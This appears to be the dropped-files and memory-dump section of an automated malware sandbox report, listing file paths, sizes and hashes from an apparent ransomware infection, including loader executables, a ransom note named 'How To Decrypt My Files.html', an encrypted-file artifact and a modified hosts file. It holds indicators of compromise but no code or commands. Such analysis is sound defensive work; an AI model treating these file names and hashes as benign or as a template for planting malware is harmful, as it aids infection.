C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
f5b0bf4edca2187f7715ddd49777a1b2

SHA1
eb78099013d0894a11c48d496f48973585f0c7c0

SHA256
562016f9159ef363fcbe62ed13ee26052b31d4f67dc5ea6d60864a7d5dfa50a1

SHA512
1039b98cffd32ca4c9e37486b96e01b167d76b19dd8440a21da4932d677c463f4c5ce2260239e8337f59bd61ff3111905e23ab71d3ca5b20e7d2935fea7952c9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
f4db60c9bb06ea5452df26771fa873ac

SHA1
c118183a1315a285606f81da05fc19367a2cdfe1

SHA256
f168242e74bfde18bacb9e18945a39bb447188eba916c7adf0f342ed8d82281e

SHA512
180ed98f9d5a14a22687a099c4a0ba6b586610f7b8b4c8de89f3b91713b07a2ef3726fcd318cb4e270b1745213b898037d29cca4b490d0c91833b797d69ac406

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
e8570d07e34b77c174faad2d591aca26

SHA1
a38bc1e7ed9024535fc400960656735dd4b35bb0

SHA256
dcdd79cc68458364c2ca2035931e6fbb326365b172225ed3f1143eed54ecf2b8

SHA512
0a84af77cd7d95f3ae462dac1eb9ee096d080e49d2d67ba1ad40a8ed8341092fae882d970bad387106c3eb2a6185004d2b7c943d57695b69ac07d39de6635fc7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres

Filesize
2KB

MD5
2f264d84c35f583f4072465ead7525a7

SHA1
497835b636c8f1ae9840f82b3d90df8067d099b0

SHA256
76e63c06a756b9be796e281f2f5c3aa3a3383b9247e4988989270f0322e18c7a

SHA512
df4d1bbda74b34fadc651c97262249c862f63f300b0d599c31f88499e85c15944b42f2a8ccd9c2a31436cdeea308a1cfc72fd84a3cfb30030f9dec881feacae7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\49dbe2955480c7f6ef8cec9c4320c9868d9293fd.tbres

Filesize
2KB

MD5
a6a291eb4cc2f2e219d336ef871cc77d

SHA1
6c79d0ed2a3dd8421fb2054523606b95da296380

SHA256
4bc77a7ebb0e81aaf138806ec82fb02cc3c8ab020b4ad276aab23c2e5978d2d1

SHA512
4c4b874bb241ea110f588615dab03bf22881c23840181419cb1212a754f746871fc800d0a354bc2bbff4f343bfb849af510f324db57fe384b74ee2070f0de0f5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
17fbfbe3f04595e251287a6bfcdc35de

SHA1
b576aabfd5e6d5799d487011506ed1ae70688987

SHA256
2e61ae727ca01496c9418a65777d6d7e05a85cbdb6b3a19516857442e5bd2da0

SHA512
449c68512d90a17f598e9dacfd6230e6e97bc6bfaaf2b06f3b91b370ece92e2322b81ee3721e288880fa1f05470156e519256e3f03d786c3b28a39788f5e0ad6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
c523adc639d16ffb0f96cebc63eed858

SHA1
12ff3728fe7a266d00bea61357e168d1ac35fb8b

SHA256
3f3c9377b171cf14fcf2bfe2ef6ab7753c1470c8fe803fb73317fa3732c55df1

SHA512
36dd1d5df9f67a708087ae024f4088fbe6ed11859c65c896f4c7b40631e418646295078abe0bd1e7062b3dd5f333d8cf86a8542ef719e4b14feec877c60839ba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
bbc2b43d5e574fe7d193c6fc0eb7302c

SHA1
f22683b94ad593fd0513fef37df1fb5d0880cc22

SHA256
0efa2469ae0b02af024fd0e2828ccab085eaefef3736b3bda0ba631e3a45aa48

SHA512
287449b168297a5176b26777f2f5ca3284d967b93274db8b3029d130049073560a10e418607f670d08194193aa91fc9cd174717e7c1d051b09c23857fe3ab9d2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
a083b3d29c2147bc07c1768229d254f5

SHA1
fd8f9b1cc2e9c82bc7733dbc4b1cec0a3566573a

SHA256
fb2039981cc1ad896d8d84c7f4617ce5482d29378ad2f6e0c17cbd41060fd6d9

SHA512
a066b08c274e1ebf28f15ffca7f82636a7bb4191303203d5288fa76a27f70907264203d212063213941cf599dcec7d23c2ae31a8faaba17e11a26e2cebbe9e8f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1c3ada0bbe1806ff2e9a9d4f76edb70a

SHA1
917390597acecc15b0e279ca6dba6b8d9f41594d

SHA256
421a98b67e3ce04ffce2a4fcd79929f77f8035e47a68811fd2c044253c97c72c

SHA512
c20b2af9a238b03025f6d2b8431375c37b5e9591c732ad6349fad2e4b074b955db0658e104d7971802025932165ae6e06fb64fe51a72048223578651d74ddf01

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
42a3371c158c084274bcac1936ac12b9

SHA1
6546651385520affc9708114cb8341a84d2b1a37

SHA256
194e06cc86ef254e19e302090e956c65302b1c48c2bb2404c15d5f32537418e5

SHA512
e102c4117c9a0a1377295f773f8567ac5f7f8811950300d004c5525d25b15d49edfae64b09b88e041435a9abb37c3d7ded31aa1a6d4c525fe1cb9c5365ad6690

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lhgz4zhu.m2e.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\controllloader.exe

Filesize
286KB

MD5
e41a0fa0c1e39af92d22090d4df61a1f

SHA1
c971a4089b1ab116c34b5ab0dc54d9977f86e834

SHA256
c0966533c2bc8c8b9ee176d774eae0ca1c4d6fe6e8efe5d87d4cac8c04b84372

SHA512
d42798fa9115f3c3775798a26ef7c28e4f173bdc2b74884b01a4e7905b17a2da09508766a626652eec3622a15a891b6859f4e9a422eb052a59b3fd3eafe1a7fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\start.cmd

Filesize
93B

MD5
f960abd9684a879e8eca03b8c864ea96

SHA1
fb4b9a9b40af84ae46b70bb40ac3e1f45e4b4ad3

SHA256
7389178da21f4e2d4ef73ab199b7beeb97247a6c1afec3f3c48a7f561cbfaf90

SHA512
2c6267ab25c364c5b13059ed593bb47dfae586ae7b1411634efa3f45aaf07b4d8f491fe93bfd34482a1250c955f1e8c27e1afa0460672a5e9584ebe007ab2054

Download Submit
C:\Users\Admin\AppData\Local\Temp\systemload.exe

Filesize
130KB

MD5
352a162df9ca5605e1a1910c7a24cb7c

SHA1
4b4ed1c740a03c15eb47d875b65c76941debcaf7

SHA256
87e9d9a7a197a0cd483f8e73f307af53a7518cabc001257c8235743181b9a7b8

SHA512
0c2bae3f66748cc3448eaf60c5079ae3afba6d585e19e54857f7c152a1bd69c3b8e3df7feb413f3eb2df0f2bc01b44be5bcdefd5427af154a221f2b808a2399d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

Filesize
202B

MD5
4566d1d70073cd75fe35acb78ff9d082

SHA1
f602ecc057a3c19aa07671b34b4fdd662aa033cc

SHA256
fe33f57205e2ebb981c4744d5a4ddc231f587a9a0589e6565c52e1051eadb0c0

SHA512
b9584ebfdd25cc588162dd6525a399c72ac03bf0c61709b96a19feba7217d840ae2c60d7b0d3b43307a2776f497a388e79ef8a646c12ae59a7f5cc4789bbf3c8

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

Filesize
3KB

MD5
9de7dd27631834429bda9b84dc78828e

SHA1
520fad1d7acbc0c2a52e88bfeffb96bfe6ac996a

SHA256
c0de6e0b535eedf2bfe130153f61dcdcbd47b72feb1e2e2145a3eca9ce48740a

SHA512
9593215c4164e3f201355a8d30004737df1a5043dc027e17ab28c822e6a9f7cd8aa8f6821c1dfdc639615d30d72a785f4357fb27b2f52f9db13cdd2f1bc2dec4

Download Submit
C:\Users\Admin\Desktop\How To Decrypt My Files.html

Filesize
639B

MD5
d2dbbc3383add4cbd9ba8e1e35872552

SHA1
020abbc821b2fe22c4b2a89d413d382e48770b6f

SHA256
5ca82cbc4d582a4a425ae328ad12fd198095e2854f4f87b27a4b09e91173a3be

SHA512
bb5e1bbf28c10c077644136b98d8d02bfec3b3e49c0829b4d4570b30e0aea0276eb748f749a491587a5e70141a7653be1d03c463a22e44efecde2e5a6c6e5e66

Download Submit
C:\Users\Admin\Documents\~$These.docx

Filesize
162B

MD5
31b4362abe012093427467208e69de2e

SHA1
ccaa0cc109904b19448416fa2cd006c070b9a307

SHA256
3dee091313610f7fa56f41b4c3af333ac48c9c574ec14a1e42215fdcfb5f6a1f

SHA512
88c50be4126d2c2c2320b7da24f88c2347fb645c4c3b546cadd7b37f5c417b164c5c51c023f6f2599a9253efee5eaff0d277328f253f447fed5c2630f258dbfa

Download Submit
C:\Users\Admin\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000001.regtrans-ms.ENC

Filesize
16B

MD5
9b7ebdb624c6c855e83b49ef58b5a564

SHA1
c3f37eeeed6631de4515049709809450e8daac93

SHA256
b10e1368316dd57a86615549d753430cff40dddd48ad59ae76bbb9bf001c631d

SHA512
2f27842d3a997d24017313a9b05b001ac2f560aaafc790dc5d2ed0bb003a2d84e62af3f387dcab277c823ad79aa4124f51becfb1f78fc95179d244eb41ec204b

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
2KB

MD5
4028457913f9d08b06137643fe3e01bc

SHA1
a5cb3f12beaea8194a2d3d83a62bdb8d558f5f14

SHA256
289d433902418aaf62e7b96b215ece04fcbcef2457daf90f46837a4d5090da58

SHA512
c8e1eef90618341bbde885fd126ece2b1911ca99d20d82f62985869ba457553b4c2bf1e841fd06dacbf27275b3b0940e5a794e1b1db0fd56440a96592362c28b

Download Submit
memory/64-120-0x0000000007A70000-0x00000000080EA000-memory.dmp

Filesize
6.5MB

Download
memory/64-121-0x0000000007420000-0x000000000743A000-memory.dmp

Filesize
104KB

Download
memory/64-30-0x0000000006130000-0x000000000617C000-memory.dmp

Filesize
304KB

Download
memory/64-27-0x0000000005C20000-0x0000000005F74000-memory.dmp

Filesize
3.3MB

Download
memory/64-26-0x0000000005BB0000-0x0000000005C16000-memory.dmp

Filesize
408KB

Download
memory/64-16-0x0000000005990000-0x00000000059F6000-memory.dmp

Filesize
408KB

Download
memory/64-153-0x0000000007660000-0x0000000007674000-memory.dmp

Filesize
80KB

Download
memory/64-148-0x0000000007650000-0x000000000765E000-memory.dmp

Filesize
56KB

Download
memory/64-79-0x00000000070D0000-0x0000000007102000-memory.dmp

Filesize
200KB

Download
memory/64-80-0x0000000070A00000-0x0000000070A4C000-memory.dmp

Filesize
304KB

Download
memory/64-90-0x0000000006690000-0x00000000066AE000-memory.dmp

Filesize
120KB

Download
memory/64-91-0x0000000074BE0000-0x0000000075390000-memory.dmp

Filesize
7.7MB

Download
memory/64-9-0x0000000074BE0000-0x0000000075390000-memory.dmp

Filesize
7.7MB

Download
memory/64-8-0x0000000004AB0000-0x0000000004AE6000-memory.dmp

Filesize
216KB

Download
memory/64-139-0x0000000007620000-0x0000000007631000-memory.dmp

Filesize
68KB

Download
memory/64-101-0x0000000004C50000-0x0000000004C60000-memory.dmp

Filesize
64KB

Download
memory/64-136-0x00000000076A0000-0x0000000007736000-memory.dmp

Filesize
600KB

Download
memory/64-102-0x0000000007310000-0x00000000073B3000-memory.dmp

Filesize
652KB

Download
memory/64-13-0x0000000004C50000-0x0000000004C60000-memory.dmp

Filesize
64KB

Download
memory/64-15-0x00000000058F0000-0x0000000005912000-memory.dmp

Filesize
136KB

Download
memory/64-11-0x0000000005290000-0x00000000058B8000-memory.dmp

Filesize
6.2MB

Download
memory/64-119-0x0000000004C50000-0x0000000004C60000-memory.dmp

Filesize
64KB

Download
memory/64-124-0x00000000074A0000-0x00000000074AA000-memory.dmp

Filesize
40KB

Download
memory/64-29-0x0000000006100000-0x000000000611E000-memory.dmp

Filesize
120KB

Download
memory/64-14-0x0000000004C50000-0x0000000004C60000-memory.dmp

Filesize
64KB

Download
memory/1072-59-0x000001EA7F710000-0x000001EA7F75E000-memory.dmp

Filesize
312KB

Download
memory/1072-64-0x00007FF9E70C0000-0x00007FF9E7B81000-memory.dmp

Filesize
10.8MB

Download
memory/1072-128-0x000001EA1A2F0000-0x000001EA1A300000-memory.dmp

Filesize
64KB

Download
memory/1072-126-0x00007FF9E70C0000-0x00007FF9E7B81000-memory.dmp

Filesize
10.8MB

Download
memory/1072-65-0x000001EA1A2F0000-0x000001EA1A300000-memory.dmp

Filesize
64KB

Download
memory/1192-63-0x0000000074BE0000-0x0000000075390000-memory.dmp

Filesize
7.7MB

Download
memory/1192-31-0x0000000005440000-0x0000000005450000-memory.dmp

Filesize
64KB

Download
memory/1192-12-0x0000000074BE0000-0x0000000075390000-memory.dmp

Filesize
7.7MB

Download
memory/1192-28-0x00000000055A0000-0x000000000563C000-memory.dmp

Filesize
624KB

Download
memory/1192-5-0x0000000000400000-0x0000000000436000-memory.dmp

Filesize
216KB

Download
memory/1600-271-0x00007FF9C6350000-0x00007FF9C6360000-memory.dmp

Filesize
64KB

Download
memory/1600-269-0x00007FF9C6350000-0x00007FF9C6360000-memory.dmp

Filesize
64KB

Download
memory/1600-273-0x00007FF9C6350000-0x00007FF9C6360000-memory.dmp

Filesize
64KB

Download
memory/1600-268-0x00007FF9C6350000-0x00007FF9C6360000-memory.dmp

Filesize
64KB

Download
memory/1600-275-0x00007FF9C6350000-0x00007FF9C6360000-memory.dmp

Filesize
64KB

Download
memory/1600-286-0x00007FF9C4290000-0x00007FF9C42A0000-memory.dmp

Filesize
64KB

Download
memory/1600-287-0x00007FF9C4290000-0x00007FF9C42A0000-memory.dmp

Filesize
64KB

Download
memory/1732-154-0x000001930BA80000-0x000001930BA90000-memory.dmp

Filesize
64KB

Download
memory/2192-0-0x0000000000FA0000-0x0000000000FDA000-memory.dmp

Filesize
232KB

Download
memory/2192-4-0x00000000059A0000-0x00000000059B0000-memory.dmp

Filesize
64KB

Download
memory/2192-2-0x0000000005EC0000-0x0000000006464000-memory.dmp

Filesize
5.6MB

Download
memory/2192-1-0x0000000074BE0000-0x0000000075390000-memory.dmp

Filesize
7.7MB

Download
memory/2192-10-0x0000000074BE0000-0x0000000075390000-memory.dmp

Filesize
7.7MB

Download
memory/2620-104-0x0000020A5B370000-0x0000020A5B392000-memory.dmp

Filesize
136KB

Download
memory/2620-97-0x0000020A5B410000-0x0000020A5B420000-memory.dmp

Filesize
64KB

Download
memory/2620-92-0x00007FF9E70C0000-0x00007FF9E7B81000-memory.dmp

Filesize
10.8MB

Download
memory/2620-93-0x0000020A5B410000-0x0000020A5B420000-memory.dmp

Filesize
64KB

Download
memory/2620-125-0x0000020A5B410000-0x0000020A5B420000-memory.dmp

Filesize
64KB

Download
memory/2620-146-0x00007FF9E70C0000-0x00007FF9E7B81000-memory.dmp

Filesize
10.8MB

Download
memory/4408-151-0x00000270546D0000-0x00000270546E0000-memory.dmp

Filesize
64KB

Download
memory/4408-152-0x00000270546D0000-0x00000270546E0000-memory.dmp

Filesize
64KB

Download
memory/4408-147-0x00007FF9E70C0000-0x00007FF9E7B81000-memory.dmp

Filesize
10.8MB

Download
memory/4484-155-0x0000000005390000-0x00000000053A0000-memory.dmp

Filesize
64KB

Download
memory/4484-149-0x0000000074BE0000-0x0000000075390000-memory.dmp

Filesize
7.7MB

Download
memory/4484-67-0x0000000074BE0000-0x0000000075390000-memory.dmp

Filesize
7.7MB

Download
memory/4484-123-0x0000000005390000-0x00000000053A0000-memory.dmp

Filesize
64KB

Download
memory/4484-68-0x0000000005390000-0x00000000053A0000-memory.dmp

Filesize
64KB

Download
memory/4484-69-0x0000000005390000-0x00000000053A0000-memory.dmp

Filesize
64KB

Download
memory/4484-127-0x0000000070A00000-0x0000000070A4C000-memory.dmp

Filesize
304KB

Download
memory/4484-150-0x0000000005390000-0x00000000053A0000-memory.dmp

Filesize
64KB

Download
memory/4696-94-0x000001F2B80B0000-0x000001F2B80C0000-memory.dmp

Filesize
64KB

Download
memory/4696-103-0x00007FF9E70C0000-0x00007FF9E7B81000-memory.dmp

Filesize
10.8MB

Download
memory/4696-109-0x000001F2B80B0000-0x000001F2B80C0000-memory.dmp

Filesize
64KB

Download
memory/4696-142-0x00007FF9E70C0000-0x00007FF9E7B81000-memory.dmp

Filesize
10.8MB

Download
memory/4996-60-0x00000000001A0000-0x00000000001C6000-memory.dmp

Filesize
152KB

Download
memory/4996-122-0x00007FF9E70C0000-0x00007FF9E7B81000-memory.dmp

Filesize
10.8MB

Download
memory/4996-62-0x00007FF9E70C0000-0x00007FF9E7B81000-memory.dmp

Filesize
10.8MB

Download